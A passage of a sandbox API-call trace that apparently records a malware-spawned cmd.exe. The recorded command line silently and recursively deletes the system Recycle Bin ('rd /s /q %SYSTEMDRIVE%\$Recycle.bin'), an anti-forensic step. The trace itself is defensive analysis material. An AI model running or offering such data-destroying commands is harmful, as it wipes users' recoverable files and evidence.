lpAddress=0x2c0000, lpBuffer=0x3bfe24, dwLength=0x1c | out: lpBuffer=0x3bfe24*(BaseAddress=0x2c0000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0081.696] VirtualQuery (in: lpAddress=0x2c1000, lpBuffer=0x3bfe24, dwLength=0x1c | out: lpBuffer=0x3bfe24*(BaseAddress=0x2c1000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0081.696] VirtualQuery (in: lpAddress=0x2c3000, lpBuffer=0x3bfe24, dwLength=0x1c | out: lpBuffer=0x3bfe24*(BaseAddress=0x2c3000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0081.696] VirtualQuery (in: lpAddress=0x3c0000, lpBuffer=0x3bfe24, dwLength=0x1c | out: lpBuffer=0x3bfe24*(BaseAddress=0x3c0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x110000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0081.696] GetConsoleOutputCP () returned 0x1b5 [0081.696] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa04260 | out: lpCPInfo=0x4aa04260) returned 1 [0081.696] SetConsoleCtrlHandler (HandlerRoutine=0x4a9fe72a, Add=1) returned 1 [0081.696] _get_osfhandle (_FileHandle=1) returned 0x32c [0081.696] SetConsoleMode (hConsoleHandle=0x32c, dwMode=0x0) returned 0 [0081.697] _get_osfhandle (_FileHandle=1) returned 0x32c [0081.697] GetConsoleMode (in: hConsoleHandle=0x32c, lpMode=0x4aa041ac | out: lpMode=0x4aa041ac) returned 0 [0081.697] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0081.697] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4aa041b0 | out: lpMode=0x4aa041b0) returned 1 [0081.712] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0081.712] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0081.712] GetEnvironmentStringsW () returned 0x672020* [0081.712] GetProcessHeap () returned 0x660000 [0081.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xaca) returned 0x672af8 [0081.713] FreeEnvironmentStringsW (penv=0x672020) returned 1 [0081.713] GetProcessHeap () returned 0x660000 [0081.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x4) returned 0x670c58 [0081.713] GetEnvironmentStringsW () returned 0x672020* [0081.713] GetProcessHeap () returned 0x660000 [0081.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xaca) returned 0x6735d0 [0081.713] FreeEnvironmentStringsW (penv=0x672020) returned 1 [0081.713] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3bedc4 | out: phkResult=0x3bedc4*=0x68) returned 0x0 [0081.713] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3bedcc, lpData=0x3bedd0, lpcbData=0x3bedc8*=0x1000 | out: lpType=0x3bedcc*=0x0, lpData=0x3bedd0*=0x0, lpcbData=0x3bedc8*=0x1000) returned 0x2 [0081.713] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3bedcc, lpData=0x3bedd0, lpcbData=0x3bedc8*=0x1000 | out: lpType=0x3bedcc*=0x4, lpData=0x3bedd0*=0x1, lpcbData=0x3bedc8*=0x4) returned 0x0 [0081.713] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3bedcc, lpData=0x3bedd0, lpcbData=0x3bedc8*=0x1000 | out: lpType=0x3bedcc*=0x0, lpData=0x3bedd0*=0x1, lpcbData=0x3bedc8*=0x1000) returned 0x2 [0081.713] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3bedcc, lpData=0x3bedd0, lpcbData=0x3bedc8*=0x1000 | out: lpType=0x3bedcc*=0x4, lpData=0x3bedd0*=0x0, lpcbData=0x3bedc8*=0x4) returned 0x0 [0081.713] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3bedcc, lpData=0x3bedd0, lpcbData=0x3bedc8*=0x1000 | out: lpType=0x3bedcc*=0x4, lpData=0x3bedd0*=0x40, lpcbData=0x3bedc8*=0x4) returned 0x0 [0081.713] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3bedcc, lpData=0x3bedd0, lpcbData=0x3bedc8*=0x1000 | out: lpType=0x3bedcc*=0x4, lpData=0x3bedd0*=0x40, lpcbData=0x3bedc8*=0x4) returned 0x0 [0081.713] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3bedcc, lpData=0x3bedd0, lpcbData=0x3bedc8*=0x1000 | out: lpType=0x3bedcc*=0x0, lpData=0x3bedd0*=0x40, lpcbData=0x3bedc8*=0x1000) returned 0x2 [0081.714] RegCloseKey (hKey=0x68) returned 0x0 [0081.714] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3bedc4 | out: phkResult=0x3bedc4*=0x68) returned 0x0 [0081.714] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3bedcc, lpData=0x3bedd0, lpcbData=0x3bedc8*=0x1000 | out: lpType=0x3bedcc*=0x0, lpData=0x3bedd0*=0x40, lpcbData=0x3bedc8*=0x1000) returned 0x2 [0081.714] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3bedcc, lpData=0x3bedd0, lpcbData=0x3bedc8*=0x1000 | out: lpType=0x3bedcc*=0x4, lpData=0x3bedd0*=0x1, lpcbData=0x3bedc8*=0x4) returned 0x0 [0081.714] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3bedcc, lpData=0x3bedd0, lpcbData=0x3bedc8*=0x1000 | out: lpType=0x3bedcc*=0x0, lpData=0x3bedd0*=0x1, lpcbData=0x3bedc8*=0x1000) returned 0x2 [0081.714] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3bedcc, lpData=0x3bedd0, lpcbData=0x3bedc8*=0x1000 | out: lpType=0x3bedcc*=0x4, lpData=0x3bedd0*=0x0, lpcbData=0x3bedc8*=0x4) returned 0x0 [0081.714] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3bedcc, lpData=0x3bedd0, lpcbData=0x3bedc8*=0x1000 | out: lpType=0x3bedcc*=0x4, lpData=0x3bedd0*=0x9, lpcbData=0x3bedc8*=0x4) returned 0x0 [0081.714] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3bedcc, lpData=0x3bedd0, lpcbData=0x3bedc8*=0x1000 | out: lpType=0x3bedcc*=0x4, lpData=0x3bedd0*=0x9, lpcbData=0x3bedc8*=0x4) returned 0x0 [0081.714] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3bedcc, lpData=0x3bedd0, lpcbData=0x3bedc8*=0x1000 | out: lpType=0x3bedcc*=0x0, lpData=0x3bedd0*=0x9, lpcbData=0x3bedc8*=0x1000) returned 0x2 [0081.714] RegCloseKey (hKey=0x68) returned 0x0 [0081.714] time (in: timer=0x0 | out: timer=0x0) returned 0x600aeb71 [0081.714] srand (_Seed=0x600aeb71) [0081.714] GetCommandLineW () returned="\"cmd.exe\" /c rd /s /q %SYSTEMDRIVE%\\\\$Recycle.bin" [0081.714] GetCommandLineW () returned="\"cmd.exe\" /c rd /s /q %SYSTEMDRIVE%\\\\$Recycle.bin" [0081.715] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0081.715] GetProcessHeap () returned 0x660000 [0081.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x210) returned 0x672020 [0081.716] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x672028, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0081.717] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aa10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0081.717] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aa10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0081.718] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4aa10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0081.718] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0081.718] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0081.718] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0081.718] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0081.718] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0081.718] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0081.718] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0081.718] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0081.718] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0081.718] GetProcessHeap () returned 0x660000 [0081.718] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x672af8 | out: hHeap=0x660000) returned 1 [0081.718] GetEnvironmentStringsW () returned 0x672238* [0081.718] GetProcessHeap () returned 0x660000 [0081.718] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xae2) returned 0x674b98 [0081.718] FreeEnvironmentStringsW (penv=0x672238) returned 1 [0081.718] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4aa10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0081.718] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4aa10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0081.718] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0081.718] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0081.718] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0081.718] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0081.718] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0081.718] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0081.718] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0081.718] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0081.718] GetProcessHeap () returned 0x660000 [0081.718] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x7c) returned 0x675688 [0081.718] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3bfb90 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0081.719] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", nBufferLength=0x104, lpBuffer=0x3bfb90, lpFilePart=0x3bfb8c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x3bfb8c*="Temp") returned 0x39 [0081.719] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp")) returned 0x2010 [0081.719] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3bf90c | out: lpFindFileData=0x3bf90c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x671ea0 [0081.719] FindClose (in: hFindFile=0x671ea0 | out: hFindFile=0x671ea0) returned 1 [0081.719] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3bf90c | out: lpFindFileData=0x3bf90c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x671ea0 [0081.719] FindClose (in: hFindFile=0x671ea0 | out: hFindFile=0x671ea0) returned 1 [0081.719] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0081.719] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFindFileData=0x3bf90c | out: lpFindFileData=0x3bf90c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x671ea0 [0081.719] FindClose (in: hFindFile=0x671ea0 | out: hFindFile=0x671ea0) returned 1 [0081.719] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFindFileData=0x3bf90c | out: lpFindFileData=0x3bf90c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x671ea0 [0081.720] FindClose (in: hFindFile=0x671ea0 | out: hFindFile=0x671ea0) returned 1 [0081.720] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", lpFindFileData=0x3bf90c | out: lpFindFileData=0x3bf90c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 0x671ea0 [0081.720] FindClose (in: hFindFile=0x671ea0 | out: hFindFile=0x671ea0) returned 1 [0081.720] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFindFileData=0x3bf90c | out: lpFindFileData=0x3bf90c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffefed10, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffefed10, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x671ea0 [0081.720] FindClose (in: hFindFile=0x671ea0 | out: hFindFile=0x671ea0) returned 1 [0081.720] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp")) returned 0x2010 [0081.720] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp")) returned 1 [0081.720] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 1 [0081.720] GetProcessHeap () returned 0x660000 [0081.720] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674b98 | out: hHeap=0x660000) returned 1 [0081.720] GetEnvironmentStringsW () returned 0x6740a8* [0081.720] GetProcessHeap () returned 0x660000 [0081.720] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xb5e) returned 0x675710 [0081.720] FreeEnvironmentStringsW (penv=0x6740a8) returned 1 [0081.720] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0081.721] GetProcessHeap () returned 0x660000 [0081.721] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675688 | out: hHeap=0x660000) returned 1 [0081.721] GetProcessHeap () returned 0x660000 [0081.721] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x400e) returned 0x676278 [0081.721] GetProcessHeap () returned 0x660000 [0081.721] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x56) returned 0x672da0 [0081.721] GetProcessHeap () returned 0x660000 [0081.721] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x676278 | out: hHeap=0x660000) returned 1 [0081.721] GetConsoleOutputCP () returned 0x1b5 [0081.811] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa04260 | out: lpCPInfo=0x4aa04260) returned 1 [0081.811] GetUserDefaultLCID () returned 0x409 [0081.811] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4aa04950, cchData=8 | out: lpLCData=":") returned 2 [0081.811] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3bfcd0, cchData=128 | out: lpLCData="0") returned 2 [0081.811] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3bfcd0, cchData=128 | out: lpLCData="0") returned 2 [0081.811] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3bfcd0, cchData=128 | out: lpLCData="1") returned 2 [0081.811] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4aa04940, cchData=8 | out: lpLCData="/") returned 2 [0081.811] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4aa04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0081.811] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4aa04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0081.811] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4aa04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0081.812] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4aa04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0081.812] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4aa04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0081.812] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4aa04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0081.812] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4aa04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0081.812] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4aa04930, cchData=8 | out: lpLCData=".") returned 2 [0081.812] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4aa04920, cchData=8 | out: lpLCData=",") returned 2 [0081.812] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0081.812] GetProcessHeap () returned 0x660000 [0081.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20c) returned 0x672e00 [0081.813] GetConsoleTitleW (in: lpConsoleTitle=0x672e00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0081.813] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0081.813] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0081.813] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0081.813] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0081.813] GetProcessHeap () returned 0x660000 [0081.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x400a) returned 0x676278 [0081.814] GetProcessHeap () returned 0x660000 [0081.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x4008) returned 0x67a290 [0081.814] GetProcessHeap () returned 0x660000 [0081.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x20) returned 0x6700d8 [0081.814] GetEnvironmentVariableW (in: lpName="SYSTEMDRIVE", lpBuffer=0x4aa10640, nSize=0x2000 | out: lpBuffer="C:") returned 0x2 [0081.814] GetProcessHeap () returned 0x660000 [0081.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6700d8 | out: hHeap=0x660000) returned 1 [0081.814] GetProcessHeap () returned 0x660000 [0081.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x67a290 | out: hHeap=0x660000) returned 1 [0081.814] GetProcessHeap () returned 0x660000 [0081.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x676278 | out: hHeap=0x660000) returned 1 [0081.814] _wcsicmp (_String1="rd", _String2=")") returned 73 [0081.814] _wcsicmp (_String1="FOR", _String2="rd") returned -12 [0081.814] _wcsicmp (_String1="FOR/?", _String2="rd") returned -12 [0081.814] _wcsicmp (_String1="IF", _String2="rd") returned -9 [0081.814] _wcsicmp (_String1="IF/?", _String2="rd") returned -9 [0081.814] _wcsicmp (_String1="REM", _String2="rd") returned 1 [0081.814] _wcsicmp (_String1="REM/?", _String2="rd") returned 1 [0081.814] GetProcessHeap () returned 0x660000 [0081.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x58) returned 0x673018 [0081.814] GetProcessHeap () returned 0x660000 [0081.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xe) returned 0x66f6f8 [0081.815] GetProcessHeap () returned 0x660000 [0081.815] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x38) returned 0x673078 [0081.816] GetConsoleTitleW (in: lpConsoleTitle=0x3bf9c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0081.816] _wcsicmp (_String1="rd", _String2="DIR") returned 14 [0081.816] _wcsicmp (_String1="rd", _String2="ERASE") returned 13 [0081.816] _wcsicmp (_String1="rd", _String2="DEL") returned 14 [0081.816] _wcsicmp (_String1="rd", _String2="TYPE") returned -2 [0081.816] _wcsicmp (_String1="rd", _String2="COPY") returned 15 [0081.816] _wcsicmp (_String1="rd", _String2="CD") returned 15 [0081.816] _wcsicmp (_String1="rd", _String2="CHDIR") returned 15 [0081.816] _wcsicmp (_String1="rd", _String2="RENAME") returned -1 [0081.816] _wcsicmp (_String1="rd", _String2="REN") returned -1 [0081.816] _wcsicmp (_String1="rd", _String2="ECHO") returned 13 [0081.816] _wcsicmp (_String1="rd", _String2="SET") returned -1 [0081.816] _wcsicmp (_String1="rd", _String2="PAUSE") returned 2 [0081.816] _wcsicmp (_String1="rd", _String2="DATE") returned 14 [0081.816] _wcsicmp (_String1="rd", _String2="TIME") returned -2 [0081.816] _wcsicmp (_String1="rd", _String2="PROMPT") returned 2 [0081.816] _wcsicmp (_String1="rd", _String2="MD") returned 5 [0081.816] _wcsicmp (_String1="rd", _String2="MKDIR") returned 5 [0081.816] _wcsicmp (_String1="rd", _String2="RD") returned 0 [0081.816] GetProcessHeap () returned 0x660000 [0081.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x68) returned 0x6730b8 [0081.818] GetProcessHeap () returned 0x660000 [0081.818] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x6730b8, Size=0x3c) returned 0x6730b8 [0081.818] GetProcessHeap () returned 0x660000 [0081.818] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6730b8) returned 0x3c [0081.818] GetProcessHeap () returned 0x660000 [0081.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x3e) returned 0x673100 [0081.818] GetProcessHeap () returned 0x660000 [0081.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x68) returned 0x673148 [0081.820] GetProcessHeap () returned 0x660000 [0081.820] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x673148, Size=0x3c) returned 0x673148 [0081.820] GetProcessHeap () returned 0x660000 [0081.820] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x673148) returned 0x3c [0081.820] GetProcessHeap () returned 0x660000 [0081.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x2a) returned 0x673190 [0081.821] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x3bf780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0081.821] FindFirstFileW (in: lpFileName="C:\\\\$Recycle.bin", lpFindFileData=0x3bf288 | out: lpFindFileData=0x3bf288*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x6731c8 [0081.821] FindClose (in: hFindFile=0x6731c8 | out: hFindFile=0x6731c8) returned 1 [0081.822] FindFirstFileW (in: lpFileName="C:\\\\$Recycle.bin\\*", lpFindFileData=0x3bf288 | out: lpFindFileData=0x3bf288*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6731c8 [0081.822] FindNextFileW (in: hFindFile=0x6731c8, lpFindFileData=0x3bf288 | out: lpFindFileData=0x3bf288*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.822] FindNextFileW (in: hFindFile=0x6731c8, lpFindFileData=0x3bf288 | out: lpFindFileData=0x3bf288*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, 